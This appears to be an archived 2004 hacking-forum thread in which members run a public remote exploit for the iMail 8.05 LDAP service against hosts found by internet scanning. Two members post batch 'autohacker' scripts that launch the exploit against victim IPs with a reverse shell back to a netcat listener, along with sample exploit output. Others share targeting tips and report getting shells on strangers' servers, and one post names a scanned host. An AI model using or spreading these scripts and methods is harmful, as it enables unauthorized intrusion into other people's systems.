Here is your proper TCP Reply...I did some scans..IP # 2489 worked TCP ports: 25
TCP 25: [220 *.*.*.se (IMail 8.05 21779-3) NT-ESMTP Server X1]
Now just need to know which os o.O
EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..
Arnie
Feb 20 2004, 03:42 PM
why the <censor> are you posting the ip from someone who happen to have imail installed??
DiJiTooL
Feb 20 2004, 03:44 PM
try with the combinaison 0 1 this combinaison seem to be universel if i use the profesional offset on my evaluation version i get a shell and ph33r @coromputer have tested with the winxp offset on his 2k machine and he got a shell
Raedemer
Feb 21 2004, 10:24 AM
QUOTE (Sedolf @ Feb 20 2004, 03:22 PM)
EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..
I don't think so, try your own imail server before saying this exploit is crap ! I think kralor tested it succesfully before bringing this exploit to public.
equinox
Feb 21 2004, 10:48 AM
no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck
MxMx
Feb 21 2004, 10:51 AM
QUOTE (equinox @ Feb 21 2004, 10:48 AM)
no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck
yea tru tru .. there are very few hosts which have installed Imail .. but the exploit itself is really great
this hotfix is still vuln. a friend of mine tested it yesterday ..
Max_Payne
Feb 22 2004, 05:14 PM
seems obvious to everyone that the exploit really works
the only thing now is that servers running iMail 8.05 are very rare..haven't found 1 yet and i've done quite a bit of searching
usch
Feb 22 2004, 05:21 PM
i dont agree with you.i've found some within 15 minutes of scanning and got 1 shell till now
dragonfly
Feb 22 2004, 05:39 PM
how do you know the version/os of the server then
Feuerstein
Feb 22 2004, 05:40 PM
QUOTE (dragonfly @ Feb 22 2004, 07:39 PM)
how do you know the version/os of the server then
just hammer all 6 combinations within 3 seconds on to the server and be lucky
QUOTE (jpno5 @ Feb 22 2004, 03:56 PM)
this hotfix is still vuln. a friend of mine tested it yesterday ..
did ya find a better one ?
Demoman
Feb 22 2004, 06:51 PM
CODE
echo off cls echo +---------------------------------------------------------+ echo ¦ IMail Autohacker ¦ echo ¦ (c) 2004 by Demoman ¦ echo +---------------------------------------------------------+ echo. echo. set /p ownip= Enter Your IP: set /p vicip= Enter the Victims's IP: set /p ncport= Enter the NC's listening port: echo. imail.exe %vicip% %ownip% %ncport% 0 0 imail.exe %vicip% %ownip% %ncport% 1 0 imail.exe %vicip% %ownip% %ncport% 2 0 imail.exe %vicip% %ownip% %ncport% 0 1 imail.exe %vicip% %ownip% %ncport% 1 1 imail.exe %vicip% %ownip% %ncport% 2 1
That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.
Greetz Demoman
dragonfly
Feb 22 2004, 07:16 PM
wow nice is it possible to get it from a .txt file ?? thanks
Siliconized
Feb 22 2004, 07:23 PM
CODE
echo off cls echo +---------------------------------------------------------+ echo ¦ IMail Autohacker ¦ echo ¦ (c) 2004 by Demoman ¦ echo +---------------------------------------------------------+ echo. echo. set /p ownip= Enter Your IP: set /p file= Enter the Filename: set /p ncport= Enter the NC's listening port: echo. for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 0 for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 1 0 for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 2 0 for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 0 1 for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 1 for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 1
Done a bit modification and that may help you if u got a file with ip
Enter the Filename: result.txt Enter Your IP: xxx.xxx.xxx.xxx Enter the NC's listening port: 99
[Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xxx.xx.x ...Done [+] Sending magic packet ...Done
[Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.xxx.x ...Done [+] Sending magic packet ...Done
Everything works fine
dragonfly
Feb 22 2004, 08:25 PM
hmm weird i don't get it
dragonfly
Feb 22 2004, 08:31 PM
wowie it works now
thnx a million demoman
Leonnetje
Feb 23 2004, 08:38 AM
QUOTE (Demoman @ Feb 22 2004, 06:51 PM)
That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.
Greetz Demoman
Tnx Demoman !! That'll do the job, now let's test this thingy....
MasteriX
Feb 23 2004, 05:02 PM
demoman's one works altough i haven't got a shell yet
Leonnetje
Feb 23 2004, 06:58 PM
QUOTE (MasteriX @ Feb 23 2004, 05:02 PM)
demoman's one works altough i haven't got a shell yet
Same here.... no shells.
Not even vulnerable scans ...
DerangeD
Feb 23 2004, 08:16 PM
I had one shell but it closed after my first command
well i will keep trying
yeyo
Feb 24 2004, 05:14 PM
I didn't try it personally, but I have a friend that got some shells
I'll ask him how he did it
so, the exploit works
ssapp
Feb 24 2004, 07:32 PM
the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond
Leonnetje
Feb 24 2004, 07:47 PM
QUOTE (ssapp @ Feb 24 2004, 07:32 PM)
the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond
That's exactly the problem... there aren't many vulnerable hosts out there, cause almost no host is running on iMail version 8.05.
And yes... i always do a banner scan
noxx
Feb 24 2004, 09:40 PM
thats true, i scanned many ips and i didn't find any imail server... i think there are many better programs so nobody uses imail
MysteryMan
Feb 26 2004, 01:01 PM
hmm i try mayby i do something with this ...
thanks
Niekos
Mar 8 2004, 09:03 PM
Hi,
Can some one explain a few things for me? What's nc? And could some one plz put down some steps to use this exploit? I think they are:
1. Scan 389 2. Check for correct version of imap 3. Get OS 4. Use exploit 5. BUT THEN?? 6. Must you get a shell in a dos box??
Thx in advance
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.